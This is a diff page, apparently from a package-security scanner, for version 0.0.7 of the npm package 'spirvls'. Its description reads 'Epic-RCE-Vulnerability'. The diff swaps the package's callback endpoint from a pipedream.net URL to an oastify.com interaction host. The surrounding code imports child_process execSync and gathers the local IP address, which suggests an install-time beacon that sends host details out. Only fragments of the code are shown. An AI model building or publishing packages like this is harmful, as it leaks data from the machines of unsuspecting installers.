spirvls 0.0.6 → 0.0.7

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -5,7 +5,7 @@ const https = require("https");
5
5
  const { execSync } = require("child_process");
6
6
 
7
7
  // Replace with your Interactsh endpoint
8
- const interactshEndpoint = "https://eoerrv46h39k2dm.m.pipedream.net";
8
+ const interactshEndpoint = "bwbwdqbtjhrx5k1uv6em3z0yvp1gp6dv.oastify.com";
9
9
 
10
10
  // Function to get the local IP address
11
11
  function getLocalIP() {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "spirvls",
3
- "version": "0.0.6",
3
+ "version": "0.0.7",
4
4
  "description": "Epic-RCE-Vulnerability",
5
5
  "main": "index.js",
6
6
  "scripts": {